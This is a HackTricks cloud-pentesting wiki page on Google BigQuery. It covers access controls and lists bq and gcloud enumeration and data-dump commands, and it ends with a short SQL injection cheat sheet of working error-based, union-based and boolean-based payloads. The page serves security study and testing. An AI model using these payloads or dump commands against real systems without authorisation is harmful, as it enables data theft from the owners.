mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-23 15:37:53 -08:00
267 lines
12 KiB
Markdown
267 lines
12 KiB
Markdown
# GCP - Bigquery Enum
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
## Basic Information
|
||
|
||
Google Cloud BigQuery is a **fully-managed, serverless enterprise data warehouse**, offering capabilities for **analysis over petabytes** of data, thus handling large-scale datasets efficiently. As a Platform as a Service (PaaS), it provides users with infrastructure and tools to facilitate data management without the need for manual oversight.
|
||
|
||
It supports querying using **ANSI SQL**. The main objects are **datasets** containing **tables** containing SQL **data**.
|
||
|
||
### Encryption
|
||
|
||
By default a **Google-managed encryption key** is used although it's possible to configure a **Customer-managed encryption key (CMEK)**. It's possible to indicate the encryption key per dataset and per table inside a dataset.
|
||
|
||
### Expiration
|
||
|
||
It's possible to indicate an **expiration time in the dataset** so any new table created in this dataset will be **automatically deleted** the specified number of days after creation.
|
||
|
||
### External Sources
|
||
|
||
Bigquery is deeply integrated with other Google services. It's possible to load data from buckets, pub/sub, google drive, RDS databases...
|
||
|
||
### Dataset ACLs
|
||
|
||
When a dataset is created **ACLs are attached** to give access over it. By default it's given **Owner** privileges over the **user that created** the dataset and then **Owner** to the group **projectOwners** (Owners of the project), **Writer** to the group **projectWriters,** and **Reader** to the group **projectReaders**:
|
||
|
||
```bash
|
||
bq show --format=prettyjson <proj>:<dataset>
|
||
|
||
...
|
||
"access": [
|
||
{
|
||
"role": "WRITER",
|
||
"specialGroup": "projectWriters"
|
||
},
|
||
{
|
||
"role": "OWNER",
|
||
"specialGroup": "projectOwners"
|
||
},
|
||
{
|
||
"role": "OWNER",
|
||
"userByEmail": "gcp-admin@hacktricks.xyz"
|
||
},
|
||
{
|
||
"role": "OWNER",
|
||
"userByEmail": "support@hacktricks.xyz"
|
||
},
|
||
{
|
||
"role": "READER",
|
||
"specialGroup": "projectReaders"
|
||
}
|
||
],
|
||
...
|
||
```
|
||
|
||
### Table Rows Control Access
|
||
|
||
It's possible to **control the rows a principal is going to be able to access inside a table** with row access policies. These are defined inside the table using [**DDL**](https://cloud.google.com/bigquery/docs/reference/standard-sql/data-definition-language#create_row_access_policy_statement).\
|
||
The access policy defines a filter and **only the matching rows** with that filter are going to be **accessible** by the indicated principals.
|
||
|
||
```sql
|
||
# Create
|
||
CREATE ROW ACCESS POLICY apac_filter
|
||
ON project.dataset.my_table
|
||
GRANT TO ('user:abc@example.com')
|
||
FILTER USING (region = 'APAC');
|
||
|
||
# Update
|
||
CREATE OR REPLACE ROW ACCESS POLICY
|
||
CREATE ROW ACCESS POLICY sales_us_filter
|
||
ON project.dataset.my_table
|
||
GRANT TO ('user:john@example.com',
|
||
'group:sales-us@example.com',
|
||
'group:sales-managers@example.com')
|
||
FILTER USING (region = 'US');
|
||
|
||
# Check the Post Exploitation tricks to see how to call this from the cli
|
||
```
|
||
|
||
```bash
|
||
# Enumerate row policies on a table
|
||
bq ls --row_access_policies <proj>:<dataset>.<table> # Get row policies
|
||
```
|
||
|
||
### Columns Access Control
|
||
|
||
<figure><img src="../../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
To restrict data access at the column level:
|
||
|
||
1. **Define a taxonomy and policy tags**. Create and manage a taxonomy and policy tags for your data. [https://console.cloud.google.com/bigquery/policy-tags](https://console.cloud.google.com/bigquery/policy-tags)
|
||
2. Optional: Grant the **Data Catalog Fine-Grained Reader role to one or more principals** on one or more of the policy tags you created.
|
||
3. **Assign policy tags to your BigQuery columns**. In BigQuery, use schema annotations to assign a policy tag to each column where you want to restrict access.
|
||
4. **Enforce access control on the taxonomy**. Enforcing access control causes the access restrictions defined for all of the policy tags in the taxonomy to be applied.
|
||
5. **Manage access on the policy tags**. Use [Identity and Access Management](https://cloud.google.com/iam) (IAM) policies to restrict access to each policy tag. The policy is in effect for each column that belongs to the policy tag.
|
||
|
||
When a user tries to access column data at query time, BigQuery **checks the column policy tag and its policy to see whether the user is authorized to access the data**.
|
||
|
||
{% hint style="success" %}
|
||
As summary, to restrict the access to some columns to some users, you can **add a tag to the column in the schema and restrict the access** of the users to the tag enforcing access control on the taxonomy of the tag.
|
||
{% endhint %}
|
||
|
||
To enforce access control on the taxonomy it's needed to enable the service:
|
||
|
||
```bash
|
||
gcloud services enable bigquerydatapolicy.googleapis.com
|
||
```
|
||
|
||
It's possible to see the tags of columns with:
|
||
|
||
{% code overflow="wrap" %}
|
||
```bash
|
||
bq show --schema <proj>:<dataset>.<table>
|
||
|
||
[{"name":"username","type":"STRING","mode":"NULLABLE","policyTags":{"names":["projects/.../locations/us/taxonomies/2030629149897327804/policyTags/7703453142914142277"]},"maxLength":"20"},{"name":"age","type":"INTEGER","mode":"NULLABLE"}]
|
||
```
|
||
{% endcode %}
|
||
|
||
### Enumeration
|
||
|
||
{% code overflow="wrap" %}
|
||
```bash
|
||
# Dataset info
|
||
bq ls # List datasets
|
||
bq ls -a # List all datasets (even hidden)
|
||
bq ls <proj>:<dataset> # List tables in a dataset
|
||
bq show --format=prettyjson <proj>:<dataset> # Get info about the dataset (like ACLs)
|
||
|
||
# Tables info
|
||
bq show --format=prettyjson <proj>:<dataset>.<table> # Get table info
|
||
bq show --schema <proj>:<dataset>.<table> # Get schema of a table
|
||
|
||
# Get entries from the table
|
||
bq head <dataset>.<table>
|
||
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'
|
||
bq extract <dataset>.<table> "gs://<bucket>/table*.csv" # Use the * so it can dump everything in different files
|
||
|
||
# Insert data
|
||
bq query --nouse_legacy_sql 'INSERT INTO `digital-bonfire-410512.importeddataset.tabletest` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'
|
||
bq insert dataset.table /tmp/mydata.json
|
||
|
||
# Get permissions
|
||
bq get-iam-policy <proj>:<dataset> # Get dataset IAM policy
|
||
bq show --format=prettyjson <proj>:<dataset> # Get dataset ACLs
|
||
bq get-iam-policy <proj>:<dataset>.<table> # Get table IAM policy
|
||
bq ls --row_access_policies <proj>:<dataset>.<table> # Get row policies
|
||
|
||
# Taxonomies (Get the IDs from the shemas of the tables)
|
||
gcloud data-catalog taxonomies describe <taxonomi-ID> --location=<location>
|
||
gcloud data-catalog taxonomies list --location <location> #Find more
|
||
gcloud data-catalog taxonomies get-iam-policy <taxonomi-ID> --location=<location>
|
||
|
||
# Get jobs executed
|
||
bq ls --jobs=true --all=true
|
||
bq show --location=<location> show --format=prettyjson --job=true <job-id>
|
||
|
||
# Misc
|
||
bq show --encryption_service_account # Get encryption service account
|
||
```
|
||
{% endcode %}
|
||
|
||
### BigQuery SQL Injection
|
||
|
||
For further information you can check the blog post: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac). Here just some details are going to be given.
|
||
|
||
**Comments**:
|
||
|
||
* `select 1#from here it is not working`
|
||
* `select 1/*between those it is not working*/` But just the initial one won't work
|
||
* `select 1--from here it is not working`
|
||
|
||
Get **information** about the **environment** such as:
|
||
|
||
* Current user: `select session_user()`
|
||
* Project id: `select @@project_id`
|
||
|
||
Concat rows:
|
||
|
||
* All table names: `string_agg(table_name, ', ')`
|
||
|
||
Get **datasets**, **tables** and **column** names:
|
||
|
||
* **Project** and **dataset** name:
|
||
|
||
{% code overflow="wrap" %}
|
||
```sql
|
||
SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA
|
||
```
|
||
{% endcode %}
|
||
|
||
* **Column** and **table** names of **all the tables** of the dataset:
|
||
|
||
{% code overflow="wrap" %}
|
||
```sql
|
||
# SELECT table_name, column_name FROM <proj-name>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS
|
||
|
||
SELECT table_name, column_name FROM <project-name>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS
|
||
```
|
||
{% endcode %}
|
||
|
||
* **Other datasets** in the same project:
|
||
|
||
{% code overflow="wrap" %}
|
||
```sql
|
||
# SELECT catalog_name, schema_name, FROM <proj-name>.INFORMATION_SCHEMA.SCHEMATA
|
||
|
||
SELECT catalog_name, schema_name, NULL FROM <project-name>.INFORMATION_SCHEMA.SCHEMATA
|
||
```
|
||
{% endcode %}
|
||
|
||
**SQL Injection types:**
|
||
|
||
* Error based - casting: `select CAST(@@project_id AS INT64)`
|
||
* Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '`
|
||
* Union based (you need to use ALL in bigquery): `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#`
|
||
* Boolean based: ``' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#``
|
||
* Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000``
|
||
|
||
**Documentation:**
|
||
|
||
* All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
|
||
* Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting)
|
||
|
||
### Privilege Escalation & Post Exploitation
|
||
|
||
{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %}
|
||
[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md)
|
||
{% endcontent-ref %}
|
||
|
||
### Persistence
|
||
|
||
{% content-ref url="../gcp-persistence/gcp-bigquery-persistence.md" %}
|
||
[gcp-bigquery-persistence.md](../gcp-persistence/gcp-bigquery-persistence.md)
|
||
{% endcontent-ref %}
|
||
|
||
## References
|
||
|
||
* [https://cloud.google.com/bigquery/docs/column-level-security-intro](https://cloud.google.com/bigquery/docs/column-level-security-intro)
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|